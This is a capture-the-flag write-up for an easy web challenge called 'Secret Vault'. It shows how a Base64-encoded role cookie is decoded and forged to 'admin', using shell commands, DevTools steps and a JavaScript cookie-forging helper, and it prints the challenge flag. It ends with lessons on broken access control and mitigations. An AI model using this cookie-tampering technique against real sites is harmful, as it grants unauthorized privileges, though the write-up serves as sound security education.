
CTF Writeup: Secret Vault - Easy Web Challenge


Challenge Overview

Challenge Name: Secret Vault
Category: Web Exploitation
Difficulty: Easy
Points: 100

The challenge presented a simple login page with the message: “Only administrators can access the secret vault!”

Initial Reconnaissance

Upon visiting the challenge URL, I was greeted with a basic login form. I tried common credentials like admin:admin and admin:password, but none worked.

Key Observations

  • No source code provided
  • Simple HTML form with username and password fields
  • After a failed login, the browser was redirected back to the same page
  • Interesting response header behavior

Discovering the Vulnerability

I opened the browser’s Developer Tools (F12) and examined the network traffic. After attempting to log in, I noticed something interesting in the Response Headers:

```http
Set-Cookie: role=dXNlcg==; Path=/
```

The cookie value dXNlcg== looked like Base64: the character set matches, and the trailing == is the padding Base64 adds when the input length is not a multiple of three bytes.

Exploitation

I decoded the cookie value using CyberChef (or command line):

```bash
echo -n "dXNlcg==" | base64 -d
```

Output: user

So the application stored my role, “user”, in a client-side cookie and, as the next step confirmed, read it back from the cookie on every request without checking whether I had changed it!

I encoded “admin” in Base64:

```bash
echo -n "admin" | base64
```

Output: YWRtaW4=

Using the browser’s Developer Tools:

  1. Open the Application tab (Chrome) or Storage tab (Firefox)
  2. Navigate to Cookies and select the challenge origin
  3. Find the role cookie
  4. Change the value from dXNlcg== to YWRtaW4=
  5. Refresh the page so the modified cookie is sent with the next request
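The same edit can be scripted from the browser console, which is handy when the cookie has to be re-forged after every redirect. The following is an added example, not code from the original writeup: it assumes only what the Set-Cookie header above shows (a cookie named role holding a bare Base64 string). The helper functions are pure, so they also run under Node.js 16 or later, where atob and btoa are globals.

```javascript
// Added example (not from the original writeup): forge the Base64 "role"
// cookie programmatically instead of editing it by hand in DevTools.
// Assumption: the cookie is named "role" and its value is plain Base64, as
// the Set-Cookie header in the writeup shows. Works in any modern browser
// console and in Node >= 16 (atob/btoa are global in both).

// Parse a "k=v; k2=v2" string (the document.cookie format) into an object.
// Splits on the first "=" only, so Base64 padding "==" inside a value survives.
function parseCookies(cookieString) {
  const jar = {};
  for (const part of cookieString.split(";")) {
    const idx = part.indexOf("=");
    if (idx === -1) continue;
    const name = part.slice(0, idx).trim();
    const value = part.slice(idx + 1).trim();
    if (name) jar[name] = value;
  }
  return jar;
}

// Decode a Base64 cookie value; returns null instead of throwing when the
// value is not valid Base64, so an unexpected cookie does not abort the script.
function decodeBase64Cookie(value) {
  try {
    return atob(value);
  } catch (e) {
    return null;
  }
}

// The role the server currently believes we have, or null if no role cookie is set.
function currentRole(cookieString) {
  const jar = parseCookies(cookieString);
  return "role" in jar ? decodeBase64Cookie(jar.role) : null;
}

// Build the forged cookie: same jar, role replaced by base64(newRole).
// Returns the "role=..." assignment usable with document.cookie (Path=/ matches
// the original Set-Cookie) plus a full Cookie header value usable with curl -b.
function forgeRoleCookie(cookieString, newRole) {
  const jar = parseCookies(cookieString);
  jar.role = btoa(newRole);
  const header = Object.entries(jar).map(([k, v]) => `${k}=${v}`).join("; ");
  return { assignment: `role=${jar.role}; Path=/`, header };
}

// Usage in the browser console on the challenge page:
//   document.cookie = forgeRoleCookie(document.cookie, "admin").assignment;
//   location.reload();
// Or from the command line with the header value (host is a placeholder):
//   curl -b "session=...; role=YWRtaW4=" https://challenge.example/
```

Note that this only works because the cookie is not HttpOnly; an HttpOnly cookie is invisible to document.cookie, but it can still be edited in DevTools or sent with curl, so HttpOnly alone would not have stopped the attack.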

Success!

After refreshing with the modified cookie, the page displayed:

```text
Welcome, Administrator!
Flag: CTF{c00k1es_4r3_n0t_s3cur3_st0r4g3}
```

Lessons Learned

This challenge demonstrates a classic broken access control vulnerability: the authorization state (the user's role) lives on the client and the server trusts it as sent.

  • Never trust client-side data: cookies, hidden fields and local storage are all under the user's control and can be edited at will
  • Encoding is not encryption: Base64 is a reversible transformation with no key, so it provides neither confidentiality nor integrity
  • Proper authentication and authorization: keep the role on the server (in a session store) or in a token whose signature the server verifies on every request
  • Cookie security flags: HttpOnly, Secure and SameSite protect a cookie against script access, cleartext transport and cross-site requests, but none of them stops the browser's owner from editing the value, so they complement integrity protection rather than replace it

Mitigation

The application should implement:

  1. Server-side session management: the cookie holds only a random, opaque session identifier, and the role is looked up on the server
  2. If state must be kept in the cookie, a cryptographically signed (or authenticated-encrypted) value, for example a JWT verified with a server-side secret and a pinned algorithm, so tampering is detected
  3. Role verification on the server for every request to a protected resource, not only at login
  4. No sensitive authorization data in plain, unauthenticated cookies, since anything the client can read it can also rewrite

Tools Used

  • Browser Developer Tools (Chrome/Firefox)
  • Base64 decoder (CyberChef / command line)

Flag

```text
CTF{c00k1es_4r3_n0t_s3cur3_st0r4g3}
```

Thanks for reading my first CTF writeup! Feel free to reach out if you have questions or want to discuss other challenges.

Happy Hacking!

This post is licensed under CC BY 4.0 by the author.
